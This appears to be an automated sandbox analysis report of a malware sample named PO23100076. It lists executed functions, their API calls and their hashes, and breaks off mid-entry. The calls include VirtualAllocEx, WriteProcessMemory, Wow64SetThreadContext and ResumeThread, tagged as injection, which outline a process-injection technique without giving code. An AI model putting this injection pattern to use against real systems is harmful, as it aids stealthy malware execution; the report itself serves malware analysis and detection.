Function 06F05EAF Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06F060EE

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 10693e6691b95735b19d74559cd3649d3041d3eaba68dccedcdcdd9aa17c19f0
Instruction ID: 3771a92f474074cb8bfb06ad70f71b753804b2336bdb73cf452ac8b70851ab57
Opcode Fuzzy Hash: 10693e6691b95735b19d74559cd3649d3041d3eaba68dccedcdcdd9aa17c19f0
Instruction Fuzzy Hash: 36916B71D003198FEB64CF68C841BEDBBB2BF48314F1485A9E809E7280DB759995DF91

Function 04AE3928 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04AE432A

Memory Dump Source

Source File: 00000000.00000002.1275851820.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ae0000_PO23100076.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: bb73f0a148ce148ac2aa7e63185526006a50371a6de6e7c582211e274f6e72db
Instruction ID: 8849facef513db112f193e35f8d13b11cc1f79888946744e810b023c3a5b6f91
Opcode Fuzzy Hash: bb73f0a148ce148ac2aa7e63185526006a50371a6de6e7c582211e274f6e72db
Instruction Fuzzy Hash: D151C0B1D00349DFDB14CF9AC884AEEBBB5FF48310F25812AE819AB211D775A845CF90

Function 04AE420D Relevance: 1.6, APIs: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04AE432A

Memory Dump Source

Source File: 00000000.00000002.1275851820.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ae0000_PO23100076.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: dad65cddf3679bca08bf1098f3712d10fa62339e16e762070c16342eefefcdd5
Instruction ID: 9d256e349a3e97a6a7bddfb5c2062ac01532c59b079f93f8656f285de4206393
Opcode Fuzzy Hash: dad65cddf3679bca08bf1098f3712d10fa62339e16e762070c16342eefefcdd5
Instruction Fuzzy Hash: 1D51D2B5D00349DFDF14CF9AC884ADDBBB5BF48310F24822AE419AB251D775A845CF40

Function 04AE3A7C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04AE68A1

Memory Dump Source

Source File: 00000000.00000002.1275851820.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ae0000_PO23100076.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 5c520ee487529dbfd28da0197644fd58eb253382e16f969559b7ebe6dd3b8c0f
Instruction ID: 7635293df1e28bdb65d40dd181b6e47f4e5452e2e29a8a6f7aeeb1a8f4c91616
Opcode Fuzzy Hash: 5c520ee487529dbfd28da0197644fd58eb253382e16f969559b7ebe6dd3b8c0f
Instruction Fuzzy Hash: 4A4129B5900305CFDB14DF96C448BAABBF5FB98314F148859D519A7321D734A845CFA1

Function 02585D10 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 025871C1

Memory Dump Source

Source File: 00000000.00000002.1272900380.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2580000_PO23100076.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 103166cb6cfece245cc78e7ebd7935e26daab89b5036c21b725495f4ab7f1f25
Instruction ID: 0e9eba907f716834f43bd7c1a3d33ef0f2346c74d7f215e7cd6a4bf8fb7d0515
Opcode Fuzzy Hash: 103166cb6cfece245cc78e7ebd7935e26daab89b5036c21b725495f4ab7f1f25
Instruction Fuzzy Hash: DB41E1B4D00719CBEB24DFA9C844B9DFBB5BF48304F20806AD409BB251DBB5A946CF91

Function 02587104 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 025871C1

Memory Dump Source

Source File: 00000000.00000002.1272900380.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2580000_PO23100076.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c336b46930e075cd826c1f7da2ee6cc40ab128d2da9bbc3338c7a407f27e2d4b
Instruction ID: fbb8f033b7cd0ee78aa7e880d04d838c98d5619215eb3d0ff5448c2e715c66f6
Opcode Fuzzy Hash: c336b46930e075cd826c1f7da2ee6cc40ab128d2da9bbc3338c7a407f27e2d4b
Instruction Fuzzy Hash: EE41E1B5C00719CBEB24DFAAC844B9DFBB1BF48314F20815AD409AB251DBB56946CF51

Function 06822400 Relevance: 1.6, APIs: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 068224C7

Memory Dump Source

Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: e5d87def43f12c1851dd5c3a7f78220121415fd9d54db43b035873aede207099
Instruction ID: e7bc0984ccda29baf79935e9862f39e75b9fc30bc7bf89b7cd92b30e784e1ddb
Opcode Fuzzy Hash: e5d87def43f12c1851dd5c3a7f78220121415fd9d54db43b035873aede207099
Instruction Fuzzy Hash: 1B319E719003599FCB11DFA9C840ADEBFF8EF09310F14805AE958E7221C3359955DFA1

Function 06F05C28 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06F05CC0

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1a7732fde13de967571195380f2f9a465e92d580736c4ddffbef40343747425e
Instruction ID: be0ae6bb020df348e9f43ecf1ed9b33c4a138c7da9666a3cfe6013f1354d8d90
Opcode Fuzzy Hash: 1a7732fde13de967571195380f2f9a465e92d580736c4ddffbef40343747425e
Instruction Fuzzy Hash: 1F2124B5D003499FDB10DFA9C881BEEBBF5FB48310F50842AE919A7291C7789941CFA4

Function 06F05C30 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06F05CC0

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8730814f06a2e0cbf885649ebef245e9ffb7cbbb0513a88fa0edd9281de241ca
Instruction ID: 84abbdd513992990435bc2ce083583430fbca7660d5a2174e0c75a1645e93082
Opcode Fuzzy Hash: 8730814f06a2e0cbf885649ebef245e9ffb7cbbb0513a88fa0edd9281de241ca
Instruction Fuzzy Hash: 7F211575D003499FDB10DFA9C981BEEBBF5FB48310F548429E959A7240C7789940DFA4

Function 0258ED70 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0258FAA6,?,?,?,?,?), ref: 0258FB67

Memory Dump Source

Source File: 00000000.00000002.1272900380.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2580000_PO23100076.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0dde68692dae4f2fede87f5a7149d9c36cda15fc1c2f6da1bccb2192ba84459e
Instruction ID: e1021662ae7cd3f0dc4d08295c9e9f28ebfde5ef526a88b168a3041c62c723ed
Opcode Fuzzy Hash: 0dde68692dae4f2fede87f5a7149d9c36cda15fc1c2f6da1bccb2192ba84459e
Instruction Fuzzy Hash: 5E21F2B59002489FDB10DFAAD885AEEBBF4FB48320F14801AE915A3250C378A940CFA4

Function 06F05220 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F052A6

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4dd7a159dc35b6a2124691743a8b276f309dd66d15884bebb8a36e5c22f5d0a7
Instruction ID: 85efeee182e8ff42b543ae46535f2f397f4cc7b2bf8352a4a2d47ddeca2968ec
Opcode Fuzzy Hash: 4dd7a159dc35b6a2124691743a8b276f309dd66d15884bebb8a36e5c22f5d0a7
Instruction Fuzzy Hash: B9211671D003498FEB10DFAAC9857AEBBF4AF48320F54852AD459A7281CB789945CF94

Function 06F05D18 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06F05DA0

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 819f0a178190c7fbe1ae58831ebaefae9818a346582920cf1809b42538e2eb97
Instruction ID: 4c4787bafce6a23a753a8831c19214526ced3b6ab9050b5183a71276e9e15f55
Opcode Fuzzy Hash: 819f0a178190c7fbe1ae58831ebaefae9818a346582920cf1809b42538e2eb97
Instruction Fuzzy Hash: 52212671C013498FDB10DFAAC845BDEBBB1BF48320F54852AE959A7281C7789541DB64

Function 06F05D20 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06F05DA0

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6f1d7ce7e9267625241552795b19134030705c081f855cffa6a2dfb093066e86
Instruction ID: d888241537594b73698c8943a3e908496d8c4ae00edc27cc0f67522c294e438b
Opcode Fuzzy Hash: 6f1d7ce7e9267625241552795b19134030705c081f855cffa6a2dfb093066e86
Instruction Fuzzy Hash: BA21F271C013499FDB10DFAAC885BEEBBB5BB48320F54842AE959A7240C7799901DBA4

Function 06F05228 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F052A6

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c7434ba7f40554702c7b63967661fa319600c2a92608f8f6dfe0dae965aaff17
Instruction ID: ab594b36e2b7e24989da6d1f7de9d379edea93278677e6fcd2f0583ececbc477
Opcode Fuzzy Hash: c7434ba7f40554702c7b63967661fa319600c2a92608f8f6dfe0dae965aaff17
Instruction Fuzzy Hash: 5C213871D003098FDB10DFAAC8857EEBBF4EF48320F548429D419A7281CB789945CFA4

Function 06F05B68 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06F05BDE

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8403c40ab9ef3745fff1bf6b8bb0226fad66931bfb9e733dc45298436763f0a1
Instruction ID: b269a3fb0402a29f860963deb751e8cc874126e3f1c0e7bbd8895e810f841053
Opcode Fuzzy Hash: 8403c40ab9ef3745fff1bf6b8bb0226fad66931bfb9e733dc45298436763f0a1
Instruction Fuzzy Hash: AC114772D002498FDB20DFA9C845BDEBBF1EF48320F248519E965A7290CB75A540DFA4

Function 06F05B70 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06F05BDE

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ce3f67567178b2f45605c00677f8f3715818b4d5da9bd3892c69eaf301befd1e
Instruction ID: 85270d76da5f5a25befb4c8592955b083dbe8b981a33bafce40b3d5f9d0544bc
Opcode Fuzzy Hash: ce3f67567178b2f45605c00677f8f3715818b4d5da9bd3892c69eaf301befd1e
Instruction Fuzzy Hash: 4E112675D003499FDB20DFAAC845BDEBBF5EB48320F148419E515A7250CB75A940CFA4

Function 06822458 Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 068224C7

Memory Dump Source

Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: d42d9ea2858fda37f7c89c4aa7d15154a8762b1c892943de81145172493520b5
Instruction ID: 104ed2373ba092fdb55fc232c4e0e48bd40f714daabec48907c9f32b87498ff4
Opcode Fuzzy Hash: d42d9ea2858fda37f7c89c4aa7d15154a8762b1c892943de81145172493520b5
Instruction Fuzzy Hash: 971149B6800349DFDB20CF9AD845BDEBFF8EB48320F14841AE914A3250C375A954CFA5

Function 06F05171 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 06F051DA

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 79b2d7bd4a44bb9383dfd5c694c75f607f97daefd457742211582b7179ba93aa
Instruction ID: 248e5d3bfdafed337035b302d5add66a6fbfe4053d3846528f1978f7ec09cf35
Opcode Fuzzy Hash: 79b2d7bd4a44bb9383dfd5c694c75f607f97daefd457742211582b7179ba93aa
Instruction Fuzzy Hash: 1B114971D003498FDB24DFAAC44579EFBF4AB48324F248419D559A7240CB796541CF94

Function 06F05178 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 06F051DA

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e4cb14cd2896b4ca9e769c1eb958ff4a3f2f368ecc649c49cdfea6affc267679
Instruction ID: 5fe60a985475732df53328cd651d6687c151fd3f458798d4425afa977b9eafec
Opcode Fuzzy Hash: e4cb14cd2896b4ca9e769c1eb958ff4a3f2f368ecc649c49cdfea6affc267679
Instruction Fuzzy Hash: 5E113671D003498FDB24DFAAC8457EEFBF5EB88324F248419D519A7240CB79A941CFA4

Function 0258D7F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0258D85E

Memory Dump Source

Source File: 00000000.00000002.1272900380.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2580000_PO23100076.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7e67797f4418773d74101896c3751e7af797018c993c3ed7333b1fea5b4ed783
Instruction ID: ff89d8fb6a8de2e33d7ff401b39134194264bcbfd415706c66daa86c54e06a1b
Opcode Fuzzy Hash: 7e67797f4418773d74101896c3751e7af797018c993c3ed7333b1fea5b4ed783
Instruction Fuzzy Hash: 651102B5C002498FCB10DFAAC444BDEFBF4EB88724F14842AD419B7250C375A545CFA5

Function 06F040BC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06F08825

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c2b3b020a3ee5aae0fbbf06a8b041f90c576d265f8a702a3773eedab7f5c744e
Instruction ID: d0ec4a4ed703aea5f5450bd8201d7906b1c22d7582aa1577ef3dee25104fc8bc
Opcode Fuzzy Hash: c2b3b020a3ee5aae0fbbf06a8b041f90c576d265f8a702a3773eedab7f5c744e
Instruction Fuzzy Hash: 3A1106B5C003499FEB10DF9AD885BDEBBF8EB48320F148419E515B7250C375A944CFA1

Function 06F087C1 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06F08825

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 171d8f28c291917f2336c18e6c763b6db7ad29061ded19f45600421b7c1441c4
Instruction ID: f0ed84ddb5e64a75fe519250c6c9ed9f9799ef13ce020cc8f8180e37d9af5a77
Opcode Fuzzy Hash: 171d8f28c291917f2336c18e6c763b6db7ad29061ded19f45600421b7c1441c4
Instruction Fuzzy Hash: 0E1103B5C003498FDB10DF99C585BDEBBF4EB08320F14881AD558A7650C375A944CFA1

Function 0091D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268818758.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91d000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fa6cd526df2b55528013435c76b28bf8ae56b801b7816b9b3d8523f8d392c8e
Instruction ID: 1215df45f18d92992572e6299bad9656bd47f225c278224958ba5ae5900a92dc
Opcode Fuzzy Hash: 0fa6cd526df2b55528013435c76b28bf8ae56b801b7816b9b3d8523f8d392c8e
Instruction Fuzzy Hash: 9E213A71605248DFDB15DF14D9C0B66BF66FBD4318F20C569E8050F25AC336D896CBA2

Function 0092D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268884742.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_92d000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67ee415431ae5cdfa57743b7076e3bdfb74288f2d465d82ae03c5463ef74c9e5
Instruction ID: 051f89e8dfcdfe76b308f0978a77b2a3d37ebbcee243fa479c2c90862b9fec8f
Opcode Fuzzy Hash: 67ee415431ae5cdfa57743b7076e3bdfb74288f2d465d82ae03c5463ef74c9e5
Instruction Fuzzy Hash: 0C210771A05300DFDB15DF10E9C4B15BB65FB84314F20C96DD8494B29AC33AD846CB61

Function 0092D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268884742.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_92d000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd66366810f7dce7010bea64be778d0d71eceb6621ec785d77c54b2f6a8bd711
Instruction ID: 36bd2e529d92134c55291c573efcb74e1758df581dbc0e83388830581a10761b
Opcode Fuzzy Hash: fd66366810f7dce7010bea64be778d0d71eceb6621ec785d77c54b2f6a8bd711
Instruction Fuzzy Hash: 9F210475685340DFDB14DF14E9C4B26BB65FB84314F20C96DD84A4B3AAC33AD847CA62

Function 0092D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268884742.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_92d000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26b3b473e000c298323a46e119a41dc1f5dc380a1cc70bfd8987fc26bea0da5d
Instruction ID: 53f4535c943edcc3a90bad6a09366703f8b9a5ae775e996c51bfe1ab78ae6429
Opcode Fuzzy Hash: 26b3b473e000c298323a46e119a41dc1f5dc380a1cc70bfd8987fc26bea0da5d
Instruction Fuzzy Hash: 4B219F755493C08FCB16CF24D990715BF71EB46314F28C5EAD8898F6A7C33A980ACB62

Function 0091D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268818758.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91d000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction ID: a655d0dbe118462a2c7982d64a6173bda25377a4962fc321dc7a0d4215a1b675
Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction Fuzzy Hash: EE11E676604284CFCF15CF14D5C4B56BF72FB94324F24C6A9E8490B65AC336D856CBA1

Function 0092D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268884742.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_92d000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction ID: 80bbd2300fc6fe9952e9fe55ac4ddc244f250a1e7bb8e5e7317c6384a41ab750
Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction Fuzzy Hash: 0C119D75504280DFDB15DF14D5C4B15FBB2FB84324F24C6ADD8494B69AC33AD84ACBA1

Function 0091D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268818758.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91d000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 005cc10e813b3f5b95190ea5fb9999bf3e3b02ea89ec261619c251c14668ef12
Instruction ID: 12b30998e32223c5e9194b64182255d2fa10241d6873507f73680a95bbcf476b
Opcode Fuzzy Hash: 005cc10e813b3f5b95190ea5fb9999bf3e3b02ea89ec261619c251c14668ef12
Instruction Fuzzy Hash: FC01F7B12053489AF7205A11CC84BA6BB9CDF41335F18C91AED190B2C2D2799885CAB2

Function 0091D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268818758.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91d000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d136042cda5ca158fed8fe0abd7b115615dcd2b67b49a1cd87cefea2bced5e8
Instruction ID: b0d5a1a1b376aaa39cf57396d0a248987afbcf60fdc8b429d25f0a4295228250
Opcode Fuzzy Hash: 8d136042cda5ca158fed8fe0abd7b115615dcd2b67b49a1cd87cefea2bced5e8
Instruction Fuzzy Hash: 7DF062715053449EE7109E15C888BA2FF9CEB51735F18C55AED085B2C6C279AC44CBB1

Non-executed Functions

Function 06828449 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

4'q, xrefs: 0682852A

Memory Dump Source

Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: affc5596b94e75b2d73f180c78bb51a5774318939db71eb977137076fafe93b3
Instruction ID: 8500d70e8285cd6274619f8ae1a86bd9fb2a0ece11db78519d25241d4fb0f36d
Opcode Fuzzy Hash: affc5596b94e75b2d73f180c78bb51a5774318939db71eb977137076fafe93b3
Instruction Fuzzy Hash: 78611C70E01209DFD718EF6AE841A9EBBF2FBC8300F54C92AD0149B279DB74594ADB51

Function 06828458 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

4'q, xrefs: 0682852A

Memory Dump Source

Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: c6ff116f4888a35840c563e5957dbab9df6f9589bf091fbb0fa669e9ec300879
Instruction ID: 3c8eb890ce509be18d8cf27c7436cd27377a38b8300823fa1c0bf673a68cbaec
Opcode Fuzzy Hash: c6ff116f4888a35840c563e5957dbab9df6f9589bf091fbb0fa669e9ec300879
Instruction Fuzzy Hash: 9761FC70E012099FD718EF6AE841A9DBBF2FBC8300F54C92AD0149B279DB74594ADB51

Function 04AE2558 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1275851820.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ae0000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bce6bbbb01b636645ceff76807afe2966518b5cc9fe40238ff95ac1f8c69743
Instruction ID: 87209dd03d519d435bea225e8c902803d039a82c46e175c95c716b3739818687
Opcode Fuzzy Hash: 6bce6bbbb01b636645ceff76807afe2966518b5cc9fe40238ff95ac1f8c69743
Instruction Fuzzy Hash: A912C6F1C817459AD310CF65E85E9893BB1BB41328FD04A09D2612F2E5EBB4126EEF4C

Function 06F03148 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
